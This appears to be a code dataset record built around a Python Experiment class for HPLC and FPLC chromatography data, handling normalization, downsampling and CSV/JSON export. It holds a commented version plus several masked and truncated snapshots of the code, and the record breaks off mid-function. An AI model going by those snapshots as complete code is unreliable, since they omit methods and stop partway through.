hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],
value_vars=['Signal', 'Normalized'], var_name='Normalization',
value_name='Value')
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
def fplc_csv(self, outfile):
if outfile[-4:] != '.csv':
outfile = outfile + '.csv'
if self.fplc is not None:
self.fplc.to_csv(outfile, index=False)
return outfile
def save_csvs(self, path):
hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))
fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))
return hplc_csv, fplc_csv
def concat_experiments(exp_list):
hplcs = []
fplcs = []
for exp in [x for x in exp_list if x.hplc is not None]:
hplc = exp.hplc
hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)
hplcs.append(hplc)
for exp in [x for x in exp_list if x.fplc is not None]:
fplc = exp.fplc
fplc['Sample'] = exp.id
fplcs.append(fplc)
concat_exp = Experiment('concat')
try:
concat_exp.hplc = pd.concat(hplcs)
except ValueError:
pass
try:
concat_exp.fplc = pd.concat(fplcs)
except ValueError:
pass
return concat_exp
<|reserved_special_token_1|>
import pandas as pd
import os
from appia.processors.core import normalizer
from math import ceil
class Experiment:
    """One chromatography experiment: optional HPLC and FPLC traces.

    Both traces are stored as long-format pandas DataFrames. The HPLC table
    uses the columns mL, Sample, Channel, Time, Normalization, Value; the
    FPLC table uses mL, CV, Fraction, Channel, Sample, Normalization, Value.
    The 'Normalization' column distinguishes raw 'Signal' rows from
    'Normalized' rows.
    """

    def __init__(self, id) -> None:
        self.id = id
        # Schema version recorded in serialized documents (see jsonify()).
        self.version = 4
        self._hplc = None
        self._fplc = None

    @property
    def hplc(self):
        # Return None instead of raising if the backing attribute was never
        # created (e.g. objects deserialized from an older schema).
        try:
            return self._hplc
        except AttributeError:
            return None

    @hplc.setter
    def hplc(self, df):
        """Store an HPLC table (or None to clear it), sorted canonically.

        Raises:
            TypeError: if df is neither a DataFrame nor None.
        """
        if isinstance(df, pd.DataFrame) or df is None:
            try:
                # Canonical row order keeps downstream grouping/plotting stable.
                self._hplc = df.sort_values(by=["Normalization", "Channel", "mL"])
            except AttributeError:
                # df is None: store as-is to clear the table.
                self._hplc = df
        else:
            raise TypeError("HPLC input is not a pandas dataframe")

    @property
    def fplc(self):
        try:
            return self._fplc
        except AttributeError:
            return None

    @fplc.setter
    def fplc(self, df):
        """Store an FPLC table (or None to clear it).

        Raises:
            TypeError: if df is neither a DataFrame nor None.
        """
        if isinstance(df, pd.DataFrame) or df is None:
            self._fplc = df
        else:
            raise TypeError("FPLC input is not a pandas dataframe")

    @property
    def wide(self):
        """Wide-format view of the raw HPLC signal.

        Returns a table indexed by Time with one '<sample> <channel>'
        column per trace, containing only rows where Normalization ==
        'Signal'.
        """
        wide = self.hplc.copy()
        wide = wide.loc[wide["Normalization"] == "Signal"]
        wide["Sample"] = wide["Sample"].astype(str) + " " + wide["Channel"]
        # BUG FIX: DataFrame.drop is not in-place; the original discarded
        # the result, leaving this line a no-op. Assign it back. (The final
        # pivot_table already selects values='Value', so output is the same,
        # but the dead statement is now an actual column drop.)
        wide = wide.drop(["Channel", "Normalization"], axis=1)
        wide = wide.pivot_table(index="Time", columns="Sample", values="Value")
        return wide

    def __repr__(self):
        to_return = f'Experiment "{self.id}" with '
        if self.hplc is not None:
            to_return += "HPLC "
        if self.hplc is not None and self.fplc is not None:
            to_return += "and "
        if self.fplc is not None:
            to_return += "FPLC "
        if self.hplc is None and self.fplc is None:
            to_return += "no "
        to_return += "data"
        return to_return

    def extend_hplc(self, hplc):
        """Append additional long-format HPLC rows to this experiment.

        Raises:
            TypeError: if hplc is not a DataFrame.
        """
        if not isinstance(hplc, pd.DataFrame):
            raise TypeError(f"Tried to extend experiment hplc with {type(hplc)}")
        self.hplc = pd.concat([self.hplc, hplc])

    def show_tables(self):
        """Print both tables to stdout; debugging aid."""
        print("HPLC:")
        print(self.hplc)
        print("FPLC:")
        print(self.fplc)

    def jsonify(self):
        """Serialize this experiment to a plain dict for document storage.

        HPLC data is pivoted so each Sample becomes a column before JSON
        encoding; a missing table serializes as the empty string.
        """
        if self.hplc is not None:
            hplc_json = (
                self.hplc.pivot_table(
                    index=["mL", "Channel", "Time", "Normalization"],
                    columns="Sample",
                    values="Value",
                )
                .reset_index()
                .to_json()
            )
        else:
            hplc_json = ""
        if self.fplc is not None:
            fplc_json = self.fplc.to_json()
        else:
            fplc_json = ""
        doc = {
            "_id": self.id,
            "version": self.version,
            "hplc": hplc_json,
            "fplc": fplc_json,
        }
        return doc

    def renormalize_hplc(self, norm_range, strict):
        """Recompute the 'Normalized' rows of the HPLC table.

        Pivots wide on Normalization, applies `normalizer` to each
        Sample/Channel group over `norm_range`, then melts back to long
        format.

        Raises:
            ValueError: if no HPLC data is loaded.
        """
        if self.hplc is None:
            raise ValueError("No HPLC data")
        # pivot + melt round-trip is pandas' equivalent of tidyverse
        # pivot_wider / pivot_longer.
        hplc = self.hplc.pivot(
            index=["mL", "Sample", "Channel", "Time"], columns=["Normalization"]
        )["Value"].reset_index()
        hplc = hplc.groupby(["Sample", "Channel"], group_keys=False).apply(
            lambda x: normalizer(x, norm_range, strict)
        )
        hplc = hplc.melt(
            id_vars=["mL", "Sample", "Channel", "Time"],
            value_vars=["Signal", "Normalized"],
            var_name="Normalization",
            value_name="Value",
        )
        self.hplc = hplc

    def renormalize_fplc(self, norm_range, strict):
        """Recompute the 'Normalized' rows of the FPLC table.

        Same pivot/apply/melt pattern as renormalize_hplc, with the
        FPLC-specific id columns (CV, Fraction).

        Raises:
            ValueError: if no FPLC data is loaded.
        """
        if self.fplc is None:
            raise ValueError("No FPLC data")
        fplc = self.fplc.pivot(
            index=["mL", "CV", "Fraction", "Channel", "Sample"],
            columns=["Normalization"],
        )["Value"].reset_index()
        fplc = fplc.groupby(["Sample", "Channel"], group_keys=False).apply(
            lambda x: normalizer(x, norm_range, strict)
        )
        fplc = fplc.melt(
            id_vars=["mL", "CV", "Channel", "Fraction", "Sample"],
            value_vars=["Signal", "Normalized"],
            var_name="Normalization",
            value_name="Value",
        )
        self.fplc = fplc

    def reduce_hplc(self, num_points):
        """Downsample the HPLC trace to at most num_points rows per
        Sample/Channel/Normalization group by keeping every k-th row."""

        def reduction_factor(df, final_points):
            # Keep every k-th row, where k is the smallest stride that
            # brings the group down to final_points or fewer rows.
            reduction_factor = ceil(df.shape[0] / final_points)
            return df[::reduction_factor]

        try:
            self.hplc = self.hplc.groupby(
                ["Channel", "Sample", "Normalization"], group_keys=False, as_index=False
            ).apply(lambda x: reduction_factor(x, num_points))
            self.hplc = self.hplc.reset_index(drop=True)
        except AttributeError:
            # No HPLC table loaded (self.hplc is None): nothing to reduce.
            return

    def rename_channels(self, channel_name_dict):
        """Rename HPLC channels via an {old_name: new_name} mapping."""
        self.hplc = self.hplc.replace({"Channel": channel_name_dict})

    def hplc_csv(self, outfile):
        """Write long- and wide-format HPLC CSVs next to `outfile`.

        Returns the long-format path, or None if there is no HPLC data.
        """
        if outfile[-4:] == ".csv":
            outfile = outfile[:-4]
        if self.hplc is not None:
            self.hplc.to_csv(outfile + "-long.csv", index=False)
            self.wide.to_csv(outfile + "-wide.csv", index=True)
            return outfile + "-long.csv"

    def fplc_csv(self, outfile):
        """Write the FPLC table to `outfile` (".csv" appended if absent).

        Returns the written path, or None if there is no FPLC data.
        """
        if outfile[-4:] != ".csv":
            outfile = outfile + ".csv"
        if self.fplc is not None:
            self.fplc.to_csv(outfile, index=False)
            return outfile

    def save_csvs(self, path):
        """Write both tables as CSVs under `path`; return (hplc, fplc) paths
        (either may be None when the corresponding data is absent)."""
        hplc_csv = self.hplc_csv(os.path.join(path, f"{self.id}_hplc"))
        fplc_csv = self.fplc_csv(os.path.join(path, f"{self.id}_fplc"))
        return hplc_csv, fplc_csv
def concat_experiments(exp_list):
    """Merge several Experiments into a single Experiment named "concat".

    HPLC sample names are prefixed with the source experiment's id so the
    traces stay distinguishable after merging; FPLC traces get the source
    experiment's id as their Sample. Experiments lacking one kind of data
    are simply skipped for that kind.

    Bug fix: the original mutated each source experiment's dataframe in
    place (the "Sample" assignment wrote through the alias returned by the
    hplc/fplc property). Work on copies so inputs are left untouched.
    """
    hplcs = []
    fplcs = []

    for exp in [x for x in exp_list if x.hplc is not None]:
        hplc = exp.hplc.copy()
        hplc["Sample"] = f"{exp.id}: " + hplc["Sample"].astype(str)
        hplcs.append(hplc)

    for exp in [x for x in exp_list if x.fplc is not None]:
        fplc = exp.fplc.copy()
        fplc["Sample"] = exp.id
        fplcs.append(fplc)

    concat_exp = Experiment("concat")
    try:
        concat_exp.hplc = pd.concat(hplcs)
    except ValueError:
        # no experiment contributed HPLC data; leave it unset
        pass

    try:
        concat_exp.fplc = pd.concat(fplcs)
    except ValueError:
        # no experiment contributed FPLC data; leave it unset
        pass

    return concat_exp
|
flexible
|
{
"blob_id": "754b34028780231c7eccb98cdf3e83bd615d843f",
"index": 5276,
"step-1": "<mask token>\n\n\nclass Experiment:\n <mask token>\n <mask token>\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n <mask token>\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n <mask token>\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n <mask token>\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], 
columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Experiment:\n\n def __init__(self, id) ->None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n <mask token>\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n <mask token>\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if 
self.hplc is None:\n raise ValueError('No HPLC data')\n hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],\n columns=['Normalization'])['Value'].reset_index()\n hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],\n value_vars=['Signal', 'Normalized'], var_name='Normalization',\n value_name='Value')\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Experiment:\n\n def __init__(self, id) ->None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n\n @fplc.setter\n def fplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n self._fplc = df\n else:\n raise TypeError('FPLC input is not a pandas dataframe')\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n\n def show_tables(self):\n print('HPLC:')\n print(self.hplc)\n print('FPLC:')\n print(self.fplc)\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if 
self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError('No HPLC data')\n hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],\n columns=['Normalization'])['Value'].reset_index()\n hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],\n value_vars=['Signal', 'Normalized'], var_name='Normalization',\n value_name='Value')\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n 
return outfile + '-long.csv'\n\n def fplc_csv(self, outfile):\n if outfile[-4:] != '.csv':\n outfile = outfile + '.csv'\n if self.fplc is not None:\n self.fplc.to_csv(outfile, index=False)\n return outfile\n\n def save_csvs(self, path):\n hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))\n fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))\n return hplc_csv, fplc_csv\n\n\ndef concat_experiments(exp_list):\n hplcs = []\n fplcs = []\n for exp in [x for x in exp_list if x.hplc is not None]:\n hplc = exp.hplc\n hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)\n hplcs.append(hplc)\n for exp in [x for x in exp_list if x.fplc is not None]:\n fplc = exp.fplc\n fplc['Sample'] = exp.id\n fplcs.append(fplc)\n concat_exp = Experiment('concat')\n try:\n concat_exp.hplc = pd.concat(hplcs)\n except ValueError:\n pass\n try:\n concat_exp.fplc = pd.concat(fplcs)\n except ValueError:\n pass\n return concat_exp\n",
"step-4": "import pandas as pd\nimport os\nfrom appia.processors.core import normalizer\nfrom math import ceil\n\n\nclass Experiment:\n\n def __init__(self, id) ->None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n\n @fplc.setter\n def fplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n self._fplc = df\n else:\n raise TypeError('FPLC input is not a pandas dataframe')\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n\n def show_tables(self):\n print('HPLC:')\n print(self.hplc)\n print('FPLC:')\n print(self.fplc)\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], 
columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError('No HPLC data')\n hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],\n columns=['Normalization'])['Value'].reset_index()\n hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],\n value_vars=['Signal', 'Normalized'], var_name='Normalization',\n value_name='Value')\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n 
self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n\n def fplc_csv(self, outfile):\n if outfile[-4:] != '.csv':\n outfile = outfile + '.csv'\n if self.fplc is not None:\n self.fplc.to_csv(outfile, index=False)\n return outfile\n\n def save_csvs(self, path):\n hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))\n fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))\n return hplc_csv, fplc_csv\n\n\ndef concat_experiments(exp_list):\n hplcs = []\n fplcs = []\n for exp in [x for x in exp_list if x.hplc is not None]:\n hplc = exp.hplc\n hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)\n hplcs.append(hplc)\n for exp in [x for x in exp_list if x.fplc is not None]:\n fplc = exp.fplc\n fplc['Sample'] = exp.id\n fplcs.append(fplc)\n concat_exp = Experiment('concat')\n try:\n concat_exp.hplc = pd.concat(hplcs)\n except ValueError:\n pass\n try:\n concat_exp.fplc = pd.concat(fplcs)\n except ValueError:\n pass\n return concat_exp\n",
"step-5": "import pandas as pd\nimport os\nfrom appia.processors.core import normalizer\nfrom math import ceil\n\n\nclass Experiment:\n def __init__(self, id) -> None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=[\"Normalization\", \"Channel\", \"mL\"])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError(\"HPLC input is not a pandas dataframe\")\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n\n @fplc.setter\n def fplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n self._fplc = df\n else:\n raise TypeError(\"FPLC input is not a pandas dataframe\")\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide[\"Normalization\"] == \"Signal\"]\n wide[\"Sample\"] = wide[\"Sample\"].astype(str) + \" \" + wide[\"Channel\"]\n wide.drop([\"Channel\", \"Normalization\"], axis=1)\n wide = wide.pivot_table(index=\"Time\", columns=\"Sample\", values=\"Value\")\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += \"HPLC \"\n if self.hplc is not None and self.fplc is not None:\n to_return += \"and \"\n if self.fplc is not None:\n to_return += \"FPLC \"\n if self.hplc is None and self.fplc is None:\n to_return += \"no \"\n to_return += \"data\"\n\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(f\"Tried to extend experiment hplc with {type(hplc)}\")\n\n self.hplc = pd.concat([self.hplc, hplc])\n\n def show_tables(self):\n print(\"HPLC:\")\n print(self.hplc)\n print(\"FPLC:\")\n print(self.fplc)\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = (\n self.hplc.pivot_table(\n 
index=[\"mL\", \"Channel\", \"Time\", \"Normalization\"],\n columns=\"Sample\",\n values=\"Value\",\n )\n .reset_index()\n .to_json()\n )\n else:\n hplc_json = \"\"\n\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = \"\"\n\n doc = {\n \"_id\": self.id,\n \"version\": self.version,\n \"hplc\": hplc_json,\n \"fplc\": fplc_json,\n }\n\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError(\"No HPLC data\")\n\n # this arcane string of pandas commands is the equivalent of pivot_wider from tidyverse\n # from https://medium.com/@durgaswaroop/reshaping-pandas-dataframes-melt-and-unmelt-9f57518c7738;.'/\n hplc = self.hplc.pivot(\n index=[\"mL\", \"Sample\", \"Channel\", \"Time\"], columns=[\"Normalization\"]\n )[\"Value\"].reset_index()\n hplc = hplc.groupby([\"Sample\", \"Channel\"], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict)\n )\n hplc = hplc.melt(\n id_vars=[\"mL\", \"Sample\", \"Channel\", \"Time\"],\n value_vars=[\"Signal\", \"Normalized\"],\n 